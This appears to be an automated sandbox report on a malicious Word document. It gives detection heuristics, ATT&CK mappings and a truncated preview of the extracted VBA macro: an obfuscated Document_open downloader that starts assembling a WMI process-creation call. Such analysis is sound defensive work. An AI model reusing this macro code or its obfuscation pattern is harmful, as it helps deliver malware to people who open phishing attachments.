MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document containing VBA macros, specifically a Document_Open macro that is designed to execute automatically. The ClamAV heuristic also flags it as a downloader. While the VBA code is heavily obfuscated and truncated, the presence of a Document_Open macro and the downloader heuristic strongly suggest it's designed to fetch and execute a second-stage payload. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469790-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469790-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7456 bytes |
SHA-256: 510b9fb2df740ca55054380eece8ab243b2f32c2b7ef22a42e4ab34c92a53a2e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Eehltfkxwg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Deihnpxkvtdue, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Zzetriydl = 234 + 423
Do While Syntoazphs = 1
Anccvwtv = 3 * Dhhowgdrgs
Txscrbspdml = ("Quibusdam soluta.")
For Gpfdgruzh = Laesmqmvn To Eksfrcxhrwkj
Xnzbvoldmrrx = ("Emmett")
Napjsmkv = 223
Next
Zrczcjaq = Ocnurxib
Loop
Foxnzyhueflj
Xcfiggdyau = 234 + 423
Do While Xhpqckvi = 1
Xwhrnsulm = 3 * Whjdossav
Fcihmzzn = ("Henry")
For Gseiaptkdohl = Zfnnrchk To Qejggvmyomqpe
Dzqrwtuhhhg = ("Stella")
Vhlvxirvgm = 223
Next
Bjwjkkbsz = Rtycwxbz
Loop
End Sub
Attribute VB_Name = "Ohxgbrilhx"
Attribute VB_Base = "0{1DDA49EA-E0D8-4BFA-BB2F-7D387BA46C00}{83E60713-1A19-44BE-A8C0-8D646D635586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Dndcbirsevqkp"
Function Xuuxbxyddksr()
Xzkikmkkawzqg = 234 + 423
Do While Sxalnqkyzwkkf = 1
Bybmwtozzgtx = 3 * Djyqrtqria
Allzbfsgvap = ("Nisi.")
For Fexaeusuovn = Ozckqahjscnz To Fjocuealosq
Msmpyohqt = ("Wendy")
Komgnbkbzf = 223
Next
Attgtdkjum = Qgnolxymedrg
Loop
Irulcyqkihc = Eehltfkxwg.Deihnpxkvtdue
Kiamvpznfhaxi = 234 + 423
Do While Qjtcsrzdngxcz = 1
Gwbeelshtsl = 3 * Hywxibwcb
Ekemfynzm = ("Odit consequatur quia facilis.")
For Eweakxca = Lsvpkztyf To Cwathgcue
Pgtathqyabjx = ("Cameron")
Iwvzubhgwcze = 223
Next
Rafgvscp = Gligkdszhb
Loop
Fbpmdeqbfmi = Irulcyqkihc + Ohxgbrilhx.Eifyggspoteqz + Ohxgbrilhx.Uyvcnxvrjqu + Ohxgbrilhx.Uvmyjiyvnrl
Uvmvbbxybkkv = 234 + 423
Do While Tzxyivsugpx = 1
Pmzeyhelrsota = 3 * Kcfmvbcicibl
Pxxrchlb = ("Ea aut dolorum incidunt aliquam quis.")
For Nzebgjeiqy = Jlpxndxw To Elcvqcywiiwty
Acsdsuaqlnmce = ("Debitis et.")
Ekprutzkt = 223
Next
Uqbgpmsbnb = Ebeuqieatdad
Loop
Iqfvaqfrc = Fbpmdeqbfmi + Ohxgbrilhx.Qjhxhbtex + Ohxgbrilhx.Nosfhhwouzj.Tag
Zuvtyrngvv = 234 + 423
Do While Rdqzmzykzmdx = 1
Ebojswaptpyy = 3 * Gljxbcjlzxiz
Lmqymemm = ("Error sed qui repellendus veritatis ea.")
For Dytckbanmd = Dgvflsbrbsc To Gzaliitu
Djgbywunqwxi = ("Sit enim.")
Htukakkv = 223
Next
Dbacevjtgmswe = Uhfmegyp
Loop
Xuuxbxyddksr = Btwdsehbglq + Iqfvaqfrc + Btwdsehbglq
Vxftjzioj = 234 + 423
Do While Qjvndqwxkmznc = 1
Xcudfewp = 3 * Nfbcftuhfzj
Rcqpuvvkc = ("Dolorum quasi qui.")
For Cfugltutzv = Uvesffxgrj To Appbuagl
Aayowmfpolbr = ("Porro.")
Pcpffgrskrfw = 223
Next
Zzpercuetril = Vjbitvmr
Loop
End Function
Function Foxnzyhueflj()
Pnrpeqoknclfz = 234 + 423
Do While Mxqczuwld = 1
Hcgohlem = 3 * Usguagyunaiw
Wbixbtcoga = ("Quas a error aut voluptatem sunt voluptatibus quia magnam ut.")
For Ezuabmhpsf = Ynyqpivka To Gcglcqgmgkoc
Nzvpmtrs = ("Ab.")
Nvlzyeyljhoyu = 223
Next
Zmsdxjlzq = Avncaobhx
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Sxlfaxujllvgc = 234 + 423
Do While Exsvlpyg = 1
Ljjjyramz = 3 * Bfkuwgahg
Migpynajuq = ("Enim.")
For Pnlanuvucnsds = Ojxznuzw To Jsmlqvrj
Glfnmltjypdw = ("Accusantium beatae unde quo vitae totam velit.")
Mawrecprjy = 223
Next
Iilsaukn = Djmcaqxl
Loop
Jbtqdshtfr = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Eehltfkxwg.Deihnpxkvtdue + "__
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.